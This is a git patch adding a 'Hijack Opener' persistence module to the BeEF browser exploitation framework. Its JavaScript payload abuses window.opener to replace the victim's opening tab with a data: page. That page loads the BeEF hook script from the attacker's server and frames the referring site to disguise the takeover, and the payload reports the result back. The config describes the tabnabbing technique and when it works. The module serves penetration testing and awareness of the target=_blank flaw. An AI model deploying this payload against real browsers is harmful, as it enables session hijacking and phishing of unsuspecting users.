From 49c3df1e44a64b7a6b2a0d543a31b6319bc5e625 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Thu, 1 Sep 2016 16:19:33 +0000
Subject: [PATCH] Add Hijack Opener module

---
 modules/persistence/hijack_opener/command.js  | 18 ++++++++++++++++++
 modules/persistence/hijack_opener/config.yaml | 16 ++++++++++++++++
 modules/persistence/hijack_opener/module.rb   | 10 ++++++++++
 3 files changed, 44 insertions(+)
 create mode 100644 modules/persistence/hijack_opener/command.js
 create mode 100644 modules/persistence/hijack_opener/config.yaml
 create mode 100644 modules/persistence/hijack_opener/module.rb

diff --git a/modules/persistence/hijack_opener/command.js b/modules/persistence/hijack_opener/command.js
new file mode 100644
index 000000000..2c7d8c49d
--- /dev/null
+++ b/modules/persistence/hijack_opener/command.js
@@ -0,0 +1,18 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var referrer = document.referrer;
+  var hook = beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+beef.net.hook;
+  try {
+    beef.debug("[Hijack Opener] Trying to hijack: " + referrer);
+    window.opener.location = 'data:text/html,<html><head><title>'+referrer+'</title><script src="'+hook+'"></'+'script><style>body {padding:0;margin:0}</style></head><body><iframe src="'+referrer+'" style="width:100%;height:100%;margin:0;padding:0;border:0"></iframe></body>';
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "success=hijacked window.opener.location", beef.are.status_success());
+  } catch (e) {
+    beef.debug("[Hijack Opener] could not hijack opener window: "+e.message)
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=could not hijack opener window: " + e.message, beef.are.status_error());
+  }
+});
diff --git a/modules/persistence/hijack_opener/config.yaml b/modules/persistence/hijack_opener/config.yaml
new file mode 100644
index 000000000..18000e9af
--- /dev/null
+++ b/modules/persistence/hijack_opener/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        hijack_opener:
+            enable: true
+            category: "Persistence"
+            name: "Hijack Opener Window"
+            description: "This module abuses window.location.opener to hijack the opening window, replacing it with a BeEF hook and 100% * 100% iframe containing the referring web page. Note that the iframe will be blank if the origin makes use of a restrictive X-Frame-Origin directive.<br/><br/>This attack will only work if the opener did not make use of the <i>noopener</i> and <i>noreferrer</i> directives. Refer to <a href='https://www.jitbit.com/alexblog/256-targetblank---the-most-underestimated-vulnerability-ever/'>Target=_blank - the most underestimated vulnerability ever</a> for more information."
+            authors: ["bcoles"]
+            target:
+                user_notify: ["FF"]
+                not_working: ["All"]
diff --git a/modules/persistence/hijack_opener/module.rb b/modules/persistence/hijack_opener/module.rb
new file mode 100644
index 000000000..4c5d00554
--- /dev/null
+++ b/modules/persistence/hijack_opener/module.rb
@@ -0,0 +1,10 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Hijack_opener < BeEF::Core::Command
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+end